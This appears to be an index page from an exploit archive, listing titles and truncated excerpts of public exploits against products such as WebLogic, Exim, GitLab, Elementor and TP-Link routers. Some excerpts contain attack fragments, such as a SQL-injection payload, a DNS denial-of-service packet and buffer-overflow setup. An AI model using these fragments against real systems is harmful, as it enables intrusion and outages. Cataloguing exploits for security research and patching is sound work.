Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Oracle WebLogic wls-wsat Component Deserialization RCE', 'Description' = %q The Oracle WebLogic WLS WSAT Component is vulnerable to a XML...

Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow

Dup Scout Enterprise 10.0.18 - 'onlineregistration' Remote Buffer Overflow Requires web service to be enabled. Tested on Windows 10 Pro x64 Based on: https://www.exploit-db.com/exploits/43145 and https://www.exploit-db.com/exploits/40457 Credits: Tulpa and SICKNESS for original exploits Modified:...

BIND - 'TSIG' Denial of Service

!/usr/bin/python coding:utf-8 from scapy.all import DNS, DNSQR, IP, sr1, UDP, DNSRRTSIG, DNSRROPT tsig = DNSRRTSIGrrname="local-ddns", algoname="hmac-sha256", rclass=255, maclen=0, macdata="", timesigned=0, fudge=300, error=16 dnsreq = IPdst='127.0.0.1'/UDPdport=53/DNSrd=1, ad=1,...

myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)

Exploit Title: myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting XSS Exploit Author: RedTeam Pentesting GmbH Vendor Homepage: https://www.myfactory.com/ Version: Enfold input NAME="txtUID" VALU...

PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)

Exploit Title: PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting XSS Date: May 3rd 2021 Exploit Author: Tyler Butler Vendor Homepage: http://timeclock.sourceforge.net Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/ Version: 1.04 Tested on...

MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path

Exploit Title: MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path Discovery by: Thalia Nieto Discovery Date: 02/01/21 Vendor Homepage: https://www.minitool.com Software Link: https://www.minitool.com/backup/thanks-download.html?v=sm-free&r=download-center/ Tested Version: 3.2...

Exim 4.87 - 4.91 - Local Privilege Escalation

!/bin/bash raptoreximwiz - "The Return of the WIZard" LPE exploit Copyright c 2019 Marco Ivaldi A flaw was found in Exim versions 4.87 to 4.91 inclusive. Improper validation of recipient address in delivermessage function in /src/deliver.c may lead to remote command execution. CVE-2019-10149 This...

Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)

!/usr/bin/env python3 -- coding: utf-8 -- standard modules from metasploit import module extra modules DEPENDENCIESMISSING = False try: import base64 import itertools import os import requests except ImportError: DEPENDENCIESMISSING = True Metasploit Metadata metadata = 'name': 'Microsoft RDP Web...

Online Documents Sharing Platform 1.0 - 'user' SQL Injection

Exploit Title: Online Documents Sharing Platform 1.0 - 'user' SQL Injection Date: 21.01.2021 Exploit Author: CANKAT ÇAKMAK Vendor Homepage: https://www.sourcecodester.com/php/14653/online-documents-sharing-platform-php-full-source-code.html Software Link:...

ASX to MP3 Converter 1.82.50 (Windows XP SP3) - '.asx' Local Stack Overflow

''' Exploit Title: ASX to MP3 Converter 1.82.50 Stack Overflow Date: 2 Oct 2015 Exploit Author: exptr Vendor Homepage: http://mini-stream.net Version: 1.82.50 Tested on: Windows XP SP3 ''' import struct filename = "exploit.asx" dummy = "A"0x104 EIP = struct.pack'I', 0x76af3adc FFFF =...

Elementor Website Builder < 3.12.2 - Admin+ SQLi

EXPLOIT Elementor Website Builder Replace URL page. On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": code : http://localhost:8080/?test',metakey='key4'where+metaid=SLEEP2; Press "Replace URL" on the Replace URL page. Burp...

RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting

Exploit Title: RAD SecFlow-1v SF02902.3.01.26 - Persistent Cross-Site Scripting Date: 2020-08-31 Exploit Author: Jonatan Schor and Uriel Yochpaz Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway Version: SecFlow-1v os-image SF02902.3.01.26 Tested on: RAD SecFlow-1v CVE : N/A A...

Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation

============================================= - Discovered by: Dawid Golunski - http://legalhackers.com - dawid at legalhackers.com - CVE-2016-1240 - Release date: 30.09.2016 - Revision: 1 - Severity: High ============================================= I. VULNERABILITY -------------------------...

PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection

Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit Date: May 4, 2012 Author: rayh4c0x4080sec0x2ecom Exploit Discovered by wofeiwo0x4080sec0x2ecom import socket import sys def cgiexploit: pwncode = """""" postLength = lenpwncode httpraw="""POST...

GitLab 11.4.7 - Remote Code Execution (Authenticated)

Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution No Interaction Required Date: 15th December 2020 Exploit Author: Mohin Paramasivam Shad0wQu35t Software Link: https://about.gitlab.com/ POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ Tested on...

Alstrasoft AskMe Pro 2.1 - Multiple SQL Injections

-+================================================================================+- -+ AlstraSoft AskMe Pro = 2.1 SQL Injection Vulnerabilitys +- -+================================================================================+- Discovered By: t0pP8uZz Discovered On: 10 JUNE 2008 Script...

Free School Management Software 1.0 - Remote Code Execution (RCE)

Exploit Title: Free School Management Software 1.0 - Remote Code Execution RCE Exploit Author: fuuzap1 Date: 7-12-2021 Category: Web application Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html Software Link:...

Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload (Authenticated)

Exploit Title: Wordpress Plugin Autoptimize 2.7.6 - Arbitrary File Upload Authenticated Date: 2020-08-24 Software Link: https://wordpress.org/plugins/autoptimize/ Author : SunCSR Team Version: v2.7.6 Tested on Ubuntu 18.04 / Kali Linux Reference: https://wpvulndb.com/vulnerabilities/10372...

LayerBB < 1.1.4 - Cross-Site Request Forgery

Exploit Title: LayerBB 1.1.3 - Multiple CSRF Date: 4/7/2019 Author: 0xB9 Twitter: @0xB9Sec Contact: 0xB9atpm.me Software Link: https://forum.layerbb.com/downloads.php?view=file&id=30 Version: 1.1.3 Tested on: Ubuntu 18.04 CVE: CVE-2019-16531 1. Description: LayerBB is a free open-source forum...

Tailor MS 1.0 - Reflected Cross-Site Scripting

Exploit Title: Tailor MS 1.0 - Reflected Cross-Site Scripting Exploit Author: Bobby Cooke boku & Adeeb Shah @hyd3sec Date: 2020-09-14 CVE ID: CVE-2020-23835 Vendor Homepage: https://www.sourcecodester.com Software Link:...

OpenEMR 5.0.1 - 'controller' Remote Code Execution

Exploit Title: OpenEMR 5.0.1 - 'controller' Remote Code Execution Date: 2020-06-22 Exploit Author: Emre ÖVÜNÇ Vendor Homepage: https://www.open-emr.org/ Software Link: https://www.open-emr.org/wiki/index.php/OpenEMRDownloads Version: v5.0.1 Tested on: Linux Link:...

JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution

JBoss AS Remote Exploit by Kingcope use IO::Socket; use LWP::UserAgent; use URI::Escape; use MIME::Base64; sub usage print "JBoss AS Remote Exploit\nby Kingcope\n\nusage: perl jboss.pl \n"; print "example: perl daytona.pl 192.168.2.10 8080 192.168.2.2 443 lnx\n"; exit; if $ARGV != 4 usage; $host ...

OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting

Exploit Title: OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting Date: 19/02/2021 Exploit Author: Kamil Breński Vendor Homepage: https://www.opentext.com/ Software Link: https://www.opentext.com/products-and-solutions/products/enterprise-content-management/content-management...

Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection (Authenticated)

Exploit Title: Nagios XI 5.7.3 - 'mibs.php' Remote Command Injection Authenticated Date: 10-27-2020 Vulnerability Discovery: Chris Lyne Vulnerability Details: https://www.tenable.com/security/research/tra-2020-58 Exploit Author: Matthew Aberegg Vendor Homepage:...

NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection

Exploit Title: NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection Exploit Author: Berk Dusunur Google Dork: N/A Type: Web App Date: 2020-05-28 Vendor Homepage: https://www.nokia.com Software Link: https://www.nokia.com/networks/products/vitalsuite-performance-management-software/ Affected...

Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read

Exploit Title: Easy Chat Server 3.1 - Directory Traversal and Arbitrary File Read Date: 11 October 2021 Exploit Author: z4nd3r Vendor Homepage: http://www.echatserver.com/ Software Link: http://www.echatserver.com/ Version: 3.1 Tested on: Windows 10 Pro Build 19042, English Description: The web...

SyncBreeze 10.0.28 - 'login' Denial of Service (Poc)

Exploit Title: SyncBreeze 10.0.28 - 'login' Denial of Service Poc Data: 18-Dec-2020 Exploit Author: Ahmed Elkhressy Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.0.28.exe Version: 10.0.28 Tested on: Windows 7, Windows 10...

TypeSetter 5.1 - CSRF (Change admin e-mail)

Exploit Title: TypeSetter 5.1 - CSRF Change admin e-mail Exploit Author: Alperen Ergel Software Homepage: https://www.typesettercms.com/ Version : 5.1 Tested on: Kali & ubuntu Category: WebApp Description Attacker can change admin e-mail address Vulnerable - Go to the admin page view preferences ...

Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution

Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE Google Dork: filetype:action Date: 06/09/2017 Exploit Author: Warflop Vendor Homepage: https://struts.apache.org/ Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip Version: Struts 2.5 – Struts 2.5.12...

orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)

Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection Authenticated Date: 28/11/2021 Exploit Author: Hubert Wojciechowski Contact Author: [email protected] Company: https://redteam.pl Vendor Homepage: https://www.orangescrum.org/ Software Link: https://www.orangescrum.org/ Version: 1.8.0...

Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Webmin 1.962 - Package Update Escape Bypass RCE Metasploit', 'Description' = %q This module exploits an arbitrary command execution vulnerability...

aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)

Exploit Title: aaPanel 6.6.6 - Authenticated Privilege Escalation Google Dork: Date: 04.05.2020 Exploit Author: Ünsal Furkan Harani Zemarkhos Vendor Homepage: https://www.aapanel.com/ Software Link: https://github.com/aaPanel/aaPanel Version: 6.6.6 REQUIRED Tested on: Linux ubuntu 4.4.0-131-gener...

Gym Management System 1.0 - Stored Cross Site Scripting

Exploit Title: Gym Management System 1.0 - Stored Cross Site Scripting Date: 21/10/2020 Exploit Author: Jyotsna Adhana Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html Software Link:...

Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)

Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution RCE Google Dork: intext:"adobe coldfusion 11" Date: 2022-22-02 Exploit Author: Amel BOUZIANE-LEBLOND https://twitter.com/amellb Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html...

Courier Management System 1.0 - 'First Name' Stored XSS

Exploit Title: Courier Management System 1.0 - 'First Name' Stored XSS Exploit Author: Zhaiyi Zeo Date: 2020-12-11 Google Dork: N/A Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html Software Link:...

RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10 - Denial of Service

Exploit Title: CVE-2024-27686: RouterOS-SMB-DOS Google Dork: N/A Date: 03/04/2024 Exploit Author: ice-wzl, Solstice Cyber Solutions Vendor Homepage: https://mikrotik.com/ Software Link: https://mikrotik.com/download/archive Version: RouterOS devices ranging from 6.40.5 - 6.44 and 6.48.1 - 6.49.10...

Voting System 1.0 - Authentication Bypass (SQLI)

Exploit Title: Voting System 1.0 - Authentication Bypass SQLI Date: 06/05/2021 Exploit Author: secure77 Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html Software Link:...

Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure

Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure Date: 20.09.2020 Exploit Author: LiquidWorm Vendor Homepage: https://pro-bravia.sony.net Version: 1.7.8 Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure Vendor: Sony Electronics Inc. Product we...

Online Shopping Alphaware 1.0 - Authentication Bypass

Title: Online Shopping Alphaware 1.0 - Authentication Bypass Exploit Author: Ahmed Abbas Date: 2020-07-28 Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html Software Link:...

FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure

Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure Auhor: Gjoko 'LiquidWorm' Krstic Date: 2018-10-14 Vendor: FLIR Systems, Inc. Product web page: https://www.flir.com Affected version: Firmware: 1.32.16, 1.17.13 OS: necov1.8-0-g7ffe5b3 Hardware: Flir Systems Neco Board...

Gym Management System 1.0 - 'id' SQL Injection

Exploit Title: Gym Management System 1.0 - 'id' SQL Injection Date: 22/10/2020 Exploit Author: Jyotsna Adhana Vendor Homepage: https://www.sourcecodester.com/php/14541/gym-management-system-using-phpmysqli-source-code.html Software Link:...

FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure

Exploit Title: FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure Author: Gjoko 'LiquidWorm' Krstic @zeroscience Date: 2018-10-14 Vendor: FLIR Systems, Inc. Product web page: https://www.flir.com Affected version: Firmware: 1.32.16, 1.17.13, OS: necov1.8-0-g7ffe5b3, Hardware: Flir Systems...

Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)

/ Source: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html Binary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe Mirror:...

PHPLiteAdmin 1.9.3 - Remote PHP Code Injection

Exploit Title: phpliteadmin phpliteadmin.php1785: 'When you create a new database, the name you entered will be appended with the appropriate file extension .db, .db3, .sqlite, etc. if you do not include it yourself. The database will be created in the directory you specified as the $directory...

TP-Link Archer AX21 - Unauthenticated Command Injection

!/usr/bin/python3 Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection Date: 07/25/2023 Exploit Author: Voyag3r https://github.com/Voyag3r-Security Vendor Homepage: https://www.tp-link.com/us/ Version: TP-Link Archer AX21 AX1800 firmware versions before 1.1.4 Build 20230219...

Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)

Exploit Title: Linux Kernel 5.1.x - 'PTRACETRACEME' pkexec Local Privilege Escalation 2 Date: 11/22/21 Exploit Author: Ujas Dhami Version: 4.19 - 5.2.1 Platform: Linux Tested on: Ubuntu 19.04 kernel 5.0.0-15-generic Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64 Kali Linux kernel...

ScadaBR 1.0 - Arbitrary File Upload (Authenticated) (2)

Exploit Title: ScadaBR 1.0 - Arbitrary File Upload Authenticated 2 Date: 04/21 Exploit Author: Fellipe Oliveira Vendor Homepage: https://www.scadabr.com.br/ Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux Tested on: Debian9,10Ubuntu16.04 !/usr/bin/python import requests,sys,time if...

WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting (XSS)

Exploit Title: WordPress Plugin Easy Contact Form 1.1.7 - 'Name' Stored Cross-Site Scripting XSS Date: 14/01/2021 Exploit Author: Rahul Ramakant Singh Vendor Homepage: https://ghozylab.com/plugins/ Software Link: https://demo.ghozylab.com/plugins/easy-contact-form-plugin/ Version: 1.1.7 Tested on...

Rumble Mail Server 0.51.3135 - 'servername' Stored XSS

Exploit Title: Rumble Mail Server 0.51.3135 - 'servername' Stored XSS Date: 2020-9-3 Exploit Author: Mohammed Alshehri Vendor Homepage: http://rumble.sf.net/ Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble0.51.3135-setup.exe Version: Version 0.51.3135 Tested...

Rukovoditel 2.6.1 - RCE (1)

Exploit Title: Rukovoditel 2.6.1 - RCE Date: 2020-06-11 Exploit Author: coiffeur Write Up: https://therealcoiffeur.github.io/c1010 Vendor Homepage: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Version: v2.6.1 CVE: CVE-2020-11819 set -e function usage echo...